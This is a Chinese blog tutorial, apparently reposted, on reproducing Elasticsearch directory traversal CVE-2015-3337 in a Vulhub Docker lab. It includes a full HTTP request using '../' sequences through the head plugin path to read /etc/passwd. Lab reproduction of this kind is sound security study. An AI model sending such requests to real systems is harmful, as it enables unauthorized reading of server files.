您的位置:首页 > 其它

利用Vulnhub复现漏洞 - ElasticSearch 目录穿越漏洞(CVE-2015-3337)测试环境

2019-07-02 17:51 2071 查看

ElasticSearch 目录穿越漏洞(CVE-2015-3337)测试环境

  • 复现漏洞
  • 漏洞复现
  • head插件
  • Vulnhub官方复现教程

    https://vulhub.org/#/environments/elasticsearch/CVE-2015-3337/

    漏洞原理

    在安装了具有“site”功能的插件以后,插件目录使用…/即可向上跳转,导致目录穿越漏洞,可读取任意文件。没有安装任意插件的elasticsearch不受影响。

    复现漏洞

    启动环境

    https://blog.csdn.net/JiangBuLiu/article/details/93853056
    进入路径为

    cd /root/vulhub/elasticsearch/CVE-2015-3337

    搭建及运行漏洞环境:

    docker-compose build && docker-compose up -d

    用时:7分钟

    漏洞复现

    测试环境默认安装了一个插件:

    elasticsearch-head
    ,主页在此:https://github.com/mobz/elasticsearch-head

    访问

    http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd
    读取任意文件(不要在浏览器访问):

    GET /_plugin/head/../../../../../../../../../etc/passwd HTTP/1.1
    Host: your-ip:9200
    Accept:*/*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
    Connection: close

    head插件

    head插件提供了elasticsearch的前端页面,访问

    http://your-ip:9200/_plugin/head/
    即可看到,不多说了。

    内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
    标签: 
    相关文章推荐